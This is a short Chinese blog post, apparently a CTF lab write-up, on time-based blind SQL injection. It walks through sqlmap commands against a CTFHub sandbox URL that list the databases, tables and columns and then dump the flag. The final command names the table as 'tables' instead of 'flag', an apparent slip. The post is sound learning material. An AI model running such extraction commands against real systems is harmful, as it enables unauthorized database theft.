2021-01-25

时间盲注

时间盲注代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,语句执行后也不提示真假,我们不能通过页面的内容来判断。这里我们可以通过构造语句,通过页面响应的时长,来判断信息,这既是时间盲注。(博主不才,不会使用 Burp Suite代理工具,所以只能用sqlmap进行爆破)

一.爆破获得数据库
输入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -dbs
结果:2021-01-25_第1张图片

(个人发现,时间盲注与布尔盲注不同的是上面多了一些东西,这可能是与布尔盲注的区别)获得数据库名

二.爆破获得表名
输入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -tables
结果:2021-01-25_第2张图片

获得表名 flag、news

三.爆破获得列名
输入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -columns
结果:2021-01-25_第3张图片

爆破获得其中的数据类型属于varchar型

四.导出数据
输入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"tables" -C"flag" -dump
结果:2021-01-25_第4张图片

爆破获得了flag。

若你对其中有些东西感到疑惑,可以去参考我的上一篇文章《布尔盲注之sqlmap爆破》,那一篇文章对许多东西有详细的解释。我也会尽快学会手工注入的。

你可能感兴趣的:(sql入门,mysql)